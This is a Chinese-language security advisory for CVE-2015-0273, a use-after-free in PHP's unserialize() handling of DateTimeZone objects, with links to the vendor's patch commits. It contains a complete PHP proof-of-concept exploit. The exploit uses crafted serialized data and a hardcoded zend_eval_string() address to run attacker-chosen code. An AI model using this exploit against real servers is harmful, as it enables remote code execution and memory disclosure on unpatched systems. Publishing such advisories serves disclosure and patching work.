发布日期:2015-02-20
更新日期:2015-03-03
受影响系统:
PHP PHP 〈 5.6.6
PHP PHP 〈 5.5.22
PHP PHP 〈 5.4.38
描述:
BUGTRAQ ID: 72701
CVE(CAN) ID: CVE-2015-0273
PHP是广泛使用的通用目的脚本语言。
PHP的unserialize()函数对DateTimeZone类型反序列化时存在释放后重用漏洞,远程攻击者可利用此漏洞在Web服务器上下文中执行任意代码,泄露任意内存。
<*来源:Taoguang Chen
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
$f = $argv[1];
$c = $argv[2];
$fakezval1 = ptr2str(0x100b83008);
$fakezval1 .= ptr2str(0x8);
$fakezval1 .= "\x00\x00\x00\x00";
$fakezval1 .= "\x06";
$fakezval1 .= "\x00";
$fakezval1 .= "\x00\x00";
$data1 =
'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}';
$x = unserialize($data1);
$y = $x[2];
// zend_eval_string()'s address
$y[0][0] = "\x6d";
$y[0][1] = "\x1e";
$y[0][2] = "\x35";
$y[0][3] = "\x00";
$y[0][4] = "\x01";
$y[0][5] = "\x00";
$y[0][6] = "\x00";
$y[0][7] = "\x00";
$fakezval2 = ptr2str(0x3b296324286624); // $f($c);
$fakezval2 .= ptr2str(0x100b83000);
$fakezval2 .= "\x00\x00\x00\x00";
$fakezval2 .= "\x05";
$fakezval2 .= "\x00";
$fakezval2 .= "\x00\x00";
$data2 =
'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;R:4;}s:8:"timezone";s:3:"UTC";}}';
$z = unserialize($data2);
function ptr2str($ptr)
{
$out = "";
for ($i=0; $i<8; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
?>
建议:
厂商补丁:
PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
?p=php-src.git;a=commit;h=c377f1a715476934133f3254d1e0d4bf3743e2d2
?p=php-src.git;a=commit;h=71335e6ebabc1b12c057d8017fd811892ecdfd24
CentOS 6.3 安装LNMP (PHP 5.4,MyySQL5.6)
Ubuntu安装Nginx php5-fpm MySQL(LNMP环境搭建)